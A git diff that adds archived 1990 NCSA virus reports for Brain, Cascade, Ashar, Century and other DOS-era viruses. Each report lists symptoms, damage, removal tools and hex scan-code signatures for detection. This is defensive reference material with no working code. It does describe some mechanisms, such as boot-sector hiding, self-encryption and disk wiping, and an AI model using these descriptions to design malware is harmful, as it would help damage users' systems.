+++ b/textfiles.com/virus/NCSA/ncsa023.txt @@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + Anarkia + + +Host Machine: PC compatibles. + +Host Files: COM and EXE files. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Progressively slows CPU operations -- a bit at first, +more over time during the session. + +Derived from: Jerusalem B. + +Scan Code: "ANARKIA" replaces "sUMsDos" of the Jerusalem B. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa024.txt b/textfiles.com/virus/NCSA/ncsa024.txt new file mode 100644 index 00000000..592e865a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa024.txt 
@@ -0,0 +1,43 @@ + Ŀ + VIRUS REPORT + Apple Virus + + +Date of Origin: Fall, 1989. + +Host Machine: Macintosh. + + The Apple virus is a "RESET" instruction followed by a "NOP" +instruction. The unusual sequence of statements (normally one would put +the "NOP" before the "RESET") makes it a surprisingly hard to detect and +disassemble. To propagate, the user must use Apple's Resource Editor +(ResEdit) to cut and paste this virus into every program that they want +it to infect. The virus seems to be more a tool for virus planters than +something that will be causing widespread damage directly. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa025.txt b/textfiles.com/virus/NCSA/ncsa025.txt new file mode 100644 index 00000000..12486b14 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa025.txt 
@@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + April 1st-B + + +Host Machine: PC compatibles. + +Host Files: EXE files. + +Scan Code: 2E A3 17 00 BB 17 00 0E 1F B4 DE CD 21 B4 2A CD 21 81 FA 01 04 +74 22 81 F9 BC 07 75 06 E8 C5 04. + + An .EXE-infecting version of .COM which will display the +characteristic message on execution of any infected .EXE file on April +1st, with associated lockup. A similar lockup will occur 1 hour after +infection of memory on any day on which the default date 1-1-80 is used. +See sURiV. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa026.txt b/textfiles.com/virus/NCSA/ncsa026.txt new file mode 100644 index 00000000..02b895a3 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa026.txt 
@@ -0,0 +1,58 @@ + Ŀ + VIRUS REPORT + Ashar Virus + + +Synonyms: Shoe_Virus, UIUC Virus + +Host Machine: PC compatibles. + +Host Files: Infects floppy disk boot sector. Remains resident. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Resident. Corrupts or overwrites boot sector. + +Detected by: Scanv41+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or the DOS SYS command. + +Derived from: Brain + +Scan Code: "ashar", found at offset 04A6 hex in the virus. + + Modifies the Brain virus message to read: + +VIRUS_SHOE RECORD, v9.0. Dedicated to the dynamic memories of millions +of virus who are no longer with us today + + This message is never displayed. + + Unlike the Brain, this virus can infect both floppies and hard disks. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa027.txt b/textfiles.com/virus/NCSA/ncsa027.txt new file mode 100644 index 00000000..c6a77b45 --- /dev/null 
+++ b/textfiles.com/virus/NCSA/ncsa027.txt @@ -0,0 +1,56 @@ + Ŀ + VIRUS REPORT + Ashar-B Virus + + +Synonyms: Shoe_Virus-B + +Host Machine: PC compatibles. + +Host Files: Infects floppy disk boot sector. Cannot infect hard disks. +Remains resident. + +OnScreen Symptoms: none. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Resident. Corrupts or overwrites boot sector. + +Detected by: Scanv41+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or the DOS SYS command. + +Derived from: Ashar + +Scan Code: "ashar", found at offset 04A6 hex in the virus. + + Modifies the Ashar virus message, changing "v9.0" to "v9.1" This +message is never displayed. Unlike the original Ashar virus, this +version can only infect floppies. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa028.txt b/textfiles.com/virus/NCSA/ncsa028.txt new file mode 100644 index 00000000..4507adb1 --- /dev/null 
+++ b/textfiles.com/virus/NCSA/ncsa028.txt @@ -0,0 +1,53 @@ + Ŀ + VIRUS REPORT + Austrian Virus And Variants + + +Synonyms: 648 Virus. + +Date of Origin: Fall, 1988. + +Place of Origin: London, England. + +Host Machine: PC compatibles. + +Host Files: COM files. + +Increase in Size of Infected Files: 648 bytes. + +Scan Code: FC 8B F2 81 C6 0A 00 BF 00 01 B9 03 00 F3 A4 8B F2 B4 30 CD 21 +3C 00 75 03 E9 C7 01. + + This is a COM infector that increases the size of the infected file +by 648 bytes without changing date/time or attributes. Intentional +damage: one infected file in eight (at random) is changed in such a way +that the program will not run. No known unintentional damage. It is not +a memory resident virus. It infects the next uninfected COM file in the +current directory (similar to the original Friday 13th). + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa029.txt b/textfiles.com/virus/NCSA/ncsa029.txt new file mode 100644 index 00000000..0ee66d7c --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa029.txt @@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + Austrian-B + + +Synonyms: 648-B. + +Host Machine: PC compatibles. + + This is similar to the original, but it causes infrequent errors in +the infected COM file so that the file will not execute. Approximately +one file in ten will be corrupted. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa030.txt b/textfiles.com/virus/NCSA/ncsa030.txt new file mode 100644 index 00000000..5b719329 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa030.txt 
@@ -0,0 +1,47 @@ + Ŀ + VIRUS REPORT + Black Hole + + +Synonyms: the Russian Virus. + +Host Machine: PC compatibles. + +Derived from: Jerusalem-C + + This virus is the Jerusalem-C that has odd text and additional code +that is never referenced. A new interrupt eight routine is added to the +non-referenced area and a number of interrupt 21 calls which appear +meaningless. The additional text includes "ANTIVIRUS". It appears that +this virus is a modified version of the Jerusalem-C/New Jerusalem. + + Note that because of the difference in EGA and CGA int 10 usage, +Jerusalem A has been observed with the blackhole effect noted on an EGA +screen. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa031.txt b/textfiles.com/virus/NCSA/ncsa031.txt new file mode 100644 index 00000000..ad0f4bbe --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa031.txt 
@@ -0,0 +1,134 @@ + Ŀ + VIRUS REPORT + Brain Virus + + +Synonyms: Pakistani, Pakistani Brain, Basit Virus. + +Date of Origin: January, 1986. + +Place of Origin: Lahore Pakistan. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy disk boot sector. + +OnScreen Symptoms: None. Use DIR to find a volume label on an infected +floppy: "(c) Brain". Using a sector editor, you should be able to find +"(c) Brain" in sector 0, as well. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Resident, taking 3-7K of RAM. Corrupts or overwrites +boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Derived from: This virus appears to be "an original." + +Scan Code: 8C C8 8E D8 8E D0 BC 00 F0 FB A0 06 7C A2 09 7C 8B 0E 07 7C 89 +0E 0A 7C E8 57 00. You can also search at 15EH for 8B 0E 07 7C 89 0E 0A 7C +E8 57. + + This virus originated in January, 1986, in Lahore Pakistan, but the +first noticeable infection problems did not surface until 1988. + + The Brain is unusual in that it includes the valid names, address and +phone numbers of the original perpetrators. It was written by two +brothers running a computer store in Lahore Pakistan. According to some +sources, Basit Farooq Alvi (one of the brothers) wrote the virus so that +it would infect machines running bootleg copies of a program he was +selling for physicians. The original Brain put a copyright notice in the +directory of floppy disks, but did no other damage to floppy disks, and +would not infect hard disks. + + This virus consists of a boot sector and three clusters (6 sectors) +marked as bad in the FAT. The first of these sectors contains the +original boot sector, and the rest contain the rest of the virus. It +only infects 360K floppies, and it occupies 7K of memory. + + The original Brain will infect a diskette whenever the diskette is +referenced. 
For example, a DIR command, executing a program from the +diskette, copying a file from or to the diskette or any other access will +cause the infection to occur. The virus stores the original boot sector, +and six extension sectors, containing the main body of the virus, in +available sectors which are then flagged as bad sectors. Diskettes have +3K of bad sectors (possibly more, if there are genuinely bad sectors, as +well.) + + The Brain causes no known intentional damage. However, it can slow +diskette access a bit, and may cause time-outs, which can make some +diskette drives unusable. + + Any attempts to examine the boot sector are likely to be intercepted +by the Brain when it is memory resident, redirecting the "view" to the +relocated boot sector. Thus, programs like the Norton Utilities will be +unable to "see" the virus. + + There are a number of unused character strings which can be used to +identify it: + + Offset 0010H: + + Welcome to the Dungeon + + (c) 1986 Basit & Amjad (pvt) Lt + +d. BRAIN COMPUTER SERVICES..730 NI + +ZAM BLOCK ALLAMA IQBAL TOWN LAHOR + +E-PAKISTAN..PHONE :430791,443248,280530. + + Beware of this VIRUS.....Contact us for vaccin + +ation............... $#@% + Offset 0202H: + + + +(c) 1986 Basit & Amjads (pvt) Ltd + + Offset 0355H: + + (c) 1986 Basit & Amjads (pvt) Ltd + + Offset 04A6H: + + (c) Brain $ + + Infected diskettes are noticeable by "@BRAIN" or "(c) BRAIN" +displayed in the volume label. Derivations can infect hard disks, and +some have had the "(c) Brain" label removed, to make detection more +difficult. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. 
Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa032.txt b/textfiles.com/virus/NCSA/ncsa032.txt new file mode 100644 index 00000000..a299c725 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa032.txt 
@@ -0,0 +1,49 @@ + Ŀ + VIRUS REPORT + Brain-B + + +Synonyms: Brain-HD, the Hard Disk Brain, Houston Virus. + +Host Machine: PC compatibles. + +OnScreen Symptoms: none. + +Nature of Damage: Resident, taking 3-7K of RAM. Corrupts or overwrites +boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Derived from: original Brain virus. + + This virus is identical in every respect to the original Brain, with +the single exception that it can infect the C drive. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa033.txt b/textfiles.com/virus/NCSA/ncsa033.txt new file mode 100644 index 00000000..44fcc968 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa033.txt 
@@ -0,0 +1,48 @@ + Ŀ + VIRUS REPORT + Brain-C + + +Host Machine: PC compatibles. + +OnScreen Symptoms: none. + +Nature of Damage: Resident, taking 3-7K of RAM. Corrupts or overwrites +boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Derived from: Brain-B. + + This virus is the Brain-B that has the volume label code removed. The +volume label of infected diskettes does not change with this virus. This +virus is difficult to detect since it does nothing overt in the system. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa034.txt b/textfiles.com/virus/NCSA/ncsa034.txt new file mode 100644 index 00000000..8b179e42 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa034.txt 
@@ -0,0 +1,111 @@ + Ŀ + VIRUS REPORT + Cascade Virus + + +Synonyms: 1701, Falling Letters, Falling Tears, Fall virus, Autumn +Leaves. + +Date of Origin: late 1987. + +Place of Origin: Switzerland? + +Host Machine: The 1701 version will infect both true IBM PC's and PC +compatibles; the 1704 version will only affect PC compatibles. This is +the only difference between the two versions. + +Host Files: Remains resident. Infects COM files. Uses self-encryption. + +OnScreen Symptoms: If the system month is between September and +December, and the system year is either 1980 or 1988, and the monitor is +either CGA or VGA, the cascade display will be activated at random +intervals. + +Increase in Size of Infected Files: 1701 or 1704 bytes (two different +versions). + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: M-1704, CleanUp, or F-Prot. You may also follow the +instructions for removing the Jerusalem virus. + +Derived from: A NumLock utility Trojan horse. + +Scan Code: Uses self-encryption. FA 8B EC E8 00 00 5B 81 EB 31 01 2E F6 +87 2A 01 01 74 0F 8D B7 4D 01 BC 82 06 31 34 31 24 46 4C 75 F8. You can +also search at offset 01BH for 31 34 31 24 46 4C 75 F8. + + This virus was adapted from a Trojan utility which was claimed to +turn of the Num Lock light and mode. The Trojan caused characters on CGA +screens to "fall" to the bottom of the screen. In late 1987 this Trojan +was turned into a memory resident COM virus, and reported by Rudolf +Rindler of Switzerland. + + Two version of the virus exist. + +* The 1701 version increases the size of COM files by 1,701 bytes, and + infect both machines containing an IBM copyright notice in the ROM + and clones. + +* The 1704 version increases the size of COM files by 1,704 bytes, and + infects only clones. + + The virus occurs attached to the end of a COM file. 
The first three +bytes of the program are stored in the virus, and replaced by a branch to +the beginning of the virus. It becomes memory-resident when the first +infected program is run, and it will then infect every COM file run (even +if the file has an EXE extension). + + The virus is unique in several ways: + +* The virus is encrypted (apart from the first 35 bytes) using an + algorithm that includes the length of the host program, so every + sample looks different. + +* The mechanics of its activation are complex, being based on + randomizations, machine types, monitor type, presence or absence of + clock cards, and time of year. The virus activates on any machine + with a CGA or VGA monitor, in the months of September, October, + November or December, in the year 1980 or 1988 (systems without clock + cards will often have a date set to 1980). + +* Occasionally, 1701 triggers a "hailstorm". The characters on the + screen behave as if the were pinned to the screen, and someone is + removing the pins one at a time <197> it looks a bit like a hailstorm, + and has appropriate sound effects. In fact, it is a purely + audio-visual effect - nothing is happening to your data. But over + -reaction at this point -- turning the machine off -- may result in + lost clusters and file damage. + + To remove the virus, either run M-1704 or follow the instructions +offered for the Jerusalem virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. 
+ + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa035.txt b/textfiles.com/virus/NCSA/ncsa035.txt new file mode 100644 index 00000000..9a358f2a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa035.txt 
@@ -0,0 +1,76 @@ + Ŀ + VIRUS REPORT + Cascade-B + + +Synonyms: 1704-B, 1701-B, Blackjack virus + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files. + +OnScreen Symptoms: There is no cascade display on the screen for this +version. The system will reboot at random intervals after activation. + +Increase in Size of Infected Files: 1701 bytes (will infect both PCs and +compatibles) or 1704 bytes (will infect only PC compatibles). + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: M-1704, M-1704C, CleanUp, or F-Prot. You may also follow the +instructions for removing the Jerusalem virus. + +Derived from: Cascade. + +Scan Code: Uses self-encryption. FA 8B EC E8 00 00 5B 81 EB 31 01 2E F6 +87 2A 01 01 74 0F 8D B7 4D 01 BC 85 06 31 34 31 24 46 4C 75 F8. You can +also search at offset 01BH for 31 34 31 24 46 4C 77 F8. + + This virus is identical to the Cascade except for these two changes: + +* it activates in the fall of any year; + +* the cascading display has been replaced with a system re-boot when + the virus activates. + + The activation uses the same interrupt 8 randomization algorithm, so +the reboot will occur at a random time interval after executing an +infected program on or after the activation date. + + This virus has the ability to infect a file more than once. Cleanup +works well at removing the virus, even from files infected multiple +times (Cleanup will have to be run the same number of times that the file +is infected). Be warned though, if you find a file has been infected more +than once, remove the virus and delete the file, as files infected more +than once will hang your computer. Files infected only once by this virus +seem to run OK after removing the virus. 
+ + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa036.txt b/textfiles.com/virus/NCSA/ncsa036.txt new file mode 100644 index 00000000..72d3612c --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa036.txt 
@@ -0,0 +1,49 @@ + Ŀ + VIRUS REPORT + Cascade-C + + +Synonyms: 1704-C + +Host Machine: PC compatibles. True IBM PCs won't be infected. + +Host Files: COM files. + +Increase in Size of Infected Files: 1704 bytes. + +Removed by: M-1704C. + +Derived from: Cascade-B + +Scan Code: F6 87 2A 01 01 74 0F 8D B7 4D 01 BC or F6 87 2A 01 01 74 0F 8D +B7 4D 01 BC 85 06 31 34 31 24 46 4C 77 F8. + + This virus is the same as the Cascade-B/1704-B, except the +activation date has been changed to occur in December of any year. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa037.txt b/textfiles.com/virus/NCSA/ncsa037.txt new file mode 100644 index 00000000..80926146 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa037.txt 
@@ -0,0 +1,42 @@ + Ŀ + VIRUS REPORT + Cascade-D + + +Synonyms: 1704-D + +Host Machine: PC compatibles. + +Derived from: Cascade + +Scan Code: F6 87 2A 01 01 74 0F 8D B7 4D 01 BC. + + This virus is the same as the Cascade/1704, except that it is able to +infect machines with an IBM copyright notice in the ROM. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa038.txt b/textfiles.com/virus/NCSA/ncsa038.txt new file mode 100644 index 00000000..9990c8c9 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa038.txt 
@@ -0,0 +1,41 @@ + Ŀ + VIRUS REPORT + Century Virus + + +Synonyms: the Oregon Virus. + +Host Machine: PC compatibles. + + This is similar to the Jerusalem-C except the activation date is +January 1, 2000. When the virus activates, it erases both FATs on all +connected drives and then begins writing zeroes to every sector on every +attached device. If allowed to continue to completion, it displays the +message - " Welcome to the 21st Century". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa039.txt b/textfiles.com/virus/NCSA/ncsa039.txt new file mode 100644 index 00000000..df35fa1e --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa039.txt 
@@ -0,0 +1,40 @@ + Ŀ + VIRUS REPORT + Century-B + + +Host Machine: PC compatibles. + +Derived from: Century virus. + + This virus is similar to the original Century virus with the +following exception: It waits for BACKUP.COM to be executed and then +garbles all program writes. After BACKUP terminates, the output +functions return to normal. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa040.txt b/textfiles.com/virus/NCSA/ncsa040.txt new file mode 100644 index 00000000..51673287 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa040.txt 
